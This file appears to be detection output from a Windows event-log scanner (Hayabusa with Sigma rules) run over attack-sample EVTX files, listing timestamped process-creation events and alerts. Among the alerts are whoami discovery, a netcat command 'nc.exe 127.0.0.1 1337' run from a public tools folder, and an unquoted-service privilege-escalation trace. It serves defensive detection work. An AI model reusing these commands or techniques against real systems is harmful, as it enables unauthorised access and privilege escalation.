dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: nc.exe 127.0.0.1 1337 : Path: C:\Users\Public\Tools\nc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:24.316 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-22 06:45:04.922 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx -2020-03-22 06:45:16.576 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx -2020-03-22 06:45:16.765 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/sysmon_10_1_ppid_spoofing.evtx -2020-04-26 07:19:00.308 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x4 /state0:0xa38bd055 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:20.134 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:22.312 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \??\C:\Windows\system32\autochk.exe * : Path: C:\Windows\System32\autochk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
\SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:22.596 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 000000cc 00000084 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:22.630 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000cc 00000084 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:23.220 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 000000d8 00000084 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:23.222 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000cc 00000084 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 
-2020-04-26 07:19:23.224 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000d8 00000084 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:23.876 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000d8 00000084 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:24.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:24.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:24.188 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:24.194 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.198 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x2 /state0:0xa3b08855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.211 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""dwm.exe"" : Path: C:\Windows\System32\dwm.exe : User: Window Manager\DWM-1 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.418 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent 
Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.432 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.482 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.600 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: 
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.603 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.158 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\Upfc.exe /launchtype boot /cv pVnjz5d3jkOKEwXZiJ9/ng.0 : Path: C:\Windows\System32\upfc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.536 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.540 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.632 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: 
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.635 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\dxgiadaptercache.exe : Path: C:\Windows\System32\dxgiadaptercache.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.642 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.643 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.645 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:26.652 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.196 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.198 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.473 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.484 +09:00,MSEDGEWIN10,1,informational,Process 
Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.764 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.836 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetSvcs -p -s iphlpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.838 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.855 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:27.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k utcsvc -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.065 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k 
netsvcs -p -s LanmanServer : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.068 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.079 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,Rule: PrivEsc - Potential Unquoted Service Exploit : Command: c:\Program Files\vulnsvc\mmm.exe : Path: C:\program.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.086 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 
